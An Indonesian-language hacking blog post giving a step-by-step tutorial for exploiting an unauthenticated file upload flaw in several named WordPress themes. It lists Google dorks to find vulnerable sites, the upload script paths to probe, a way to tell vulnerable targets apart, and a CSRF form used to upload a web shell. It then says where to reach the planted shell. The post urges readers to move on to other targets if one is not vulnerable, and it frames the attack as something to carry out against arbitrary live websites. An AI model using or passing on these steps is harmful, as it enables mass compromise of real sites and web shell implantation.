WordPress Theme File Upload Vulnerability

Unknown 04.07 1 comment
 
Assalamualaikum sobat blogger, kali ini saya mau share Tutorial WordPress Theme File Upload Vulnerability, ok langsung saja disimak ;)

Bahan Bahan :

- CSRF ( Ambil Scriptnya Disini ) lalu save dengan extensi .html / .htm
- Shell ( Download ) Password shell : enter

Langkah - Langkah :

1. Pilih salah satu theme dibawah ini :
    
     wilderness
     geoplaces
     cleanple
     brilliant
     qreator
     trymee
     pacifico
     ambleside
     clockstone
     money
     shepard

2. Copy salah satu dork dibawah ini, lalu paste di google

     inurl:"/wp-content/themes/wilderness"
     inurl:"/wp-content/themes/geoplaces"
     inurl:"/wp-content/themes/cleanple"
     inurl:"/wp-content/themes/brilliant"
     inurl:"/wp-content/themes/qreator"
     inurl:"/wp-content/themes/trymee"
     inurl:"/wp-content/themes/pacifico"
     inurl:"/wp-content/themes/ambleside"
     inurl:"/wp-content/themes/clockstone"
     inurl:"/wp-content/themes/money"
     inurl:"/wp-content/themes/shepard"

3. Lalu pilih salah satu website, dan masukan exploit ini :

    /wp-content/themes/[Nama Theme]/theme/functions/uploadbg.php
    /wp-content/themes/[Nama Theme]/theme/functions/upload-bg.php
    /wp-content/themes/[Nama Theme]/theme/functions/upload.php

  Contoh : http://site.domain/wp-content/themes/trymee/theme/functions/uploadbg.php
                http://site.domain/wp-content/themes/trymee/theme/functions/upload-bg.php 
               http://site.domain/wp-content/themes/trymee/theme/functions/upload.php 

4. Jika ada bacaan ' error ' itu berarti Vuln, kalo bacaannya ' You must be logged in to access this script. ' itu berarti tidak vuln, lebih baik cari target lain :D
                                                                Vuln :
 
                                                               Not Vuln :
5. Lalu sekarang kita buka CSRF nya dan Masukan targetnya, lalu save dan upload shell kalian 

6. Jika upload shellnya sukses, akan muncul angka random seperti gambar dibawah ini :

7. Setelah itu tinggal di akses deh shellnya :D
    Akses shell di : www.site.domain/wp-content/themes/trymee/theme/functions/[angka random].php


 Ok Sekian tutornya dan salam Ganteng, Wassalamualaikum Wr Wb


Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

1 komentar:

Diberdayakan oleh Blogger.

Copyright © 2014 • Eitaro Attacker | BLOG

Blogger Templates Designed by VeeThemes.com